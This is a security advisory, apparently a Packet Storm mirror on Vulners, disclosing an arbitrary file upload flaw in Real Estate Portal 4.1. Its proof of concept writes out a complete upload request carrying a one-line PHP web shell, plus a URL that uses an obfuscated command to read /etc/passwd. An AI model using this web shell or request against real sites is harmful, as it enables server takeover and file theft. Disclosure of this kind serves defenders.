Lucene search
K

Real Estate Portal 4.1 Remote Code Execution

🗓️ 26 May 2016 00:00:00Reported by Bikramaditya GuhaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

Real Estate Portal v4.1 Remote Code Executio

Code
`  
Real Estate Portal v4.1 Remote Code Execution Vulnerability  
  
  
Vendor: NetArt Media  
Product web page: http://www.netartmedia.net  
Affected version: 4.1  
  
Summary: Real Estate Portal is a software written in PHP,  
allowing you to launch powerful and professional looking  
real estate portals with rich functionalities for the private  
sellers, buyers and real estate agents to list properties  
for sale or rent, search in the database, show featured  
ads and many others. The private sellers can manage their  
ads at any time through their personal administration space.  
  
Desc: Real Estate Portal suffers from an arbitrary file upload  
vulnerability leading to an arbitrary PHP code execution. The  
vulnerability is caused due to the improper verification of  
uploaded files in '/upload.php' script thru the 'myfile' POST  
parameter. This can be exploited to execute arbitrary PHP code  
by uploading a malicious PHP script file with '.php' extension  
that will be stored in the '/uploads' directory.   
  
Tested on: nginx/1.10.0  
PHP/5.2.17  
MySQL/5.1.66  
  
  
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5325  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php  
  
  
06.05.2016  
  
---  
  
  
1. Arbitrary File Upload:  
-------------------------  
  
Parameter: myfile (POST)  
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29  
  
POST /upload.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost/USERS/index.php  
Content-Length: 419  
Content-Type: multipart/form-data; boundary=---------------------------8914507815764  
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214  
Connection: close  
  
-----------------------------8914507815764  
Content-Disposition: form-data; name="myfile"; filename="Test.php"  
Content-Type: image/jpeg  
  
<?php  
system($_GET['cmd']);   
?>  
  
-----------------------------8914507815764  
Content-Disposition: form-data; name=""  
  
undefined  
-----------------------------8914507815764  
Content-Disposition: form-data; name=""  
  
undefined  
-----------------------------8914507815764--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation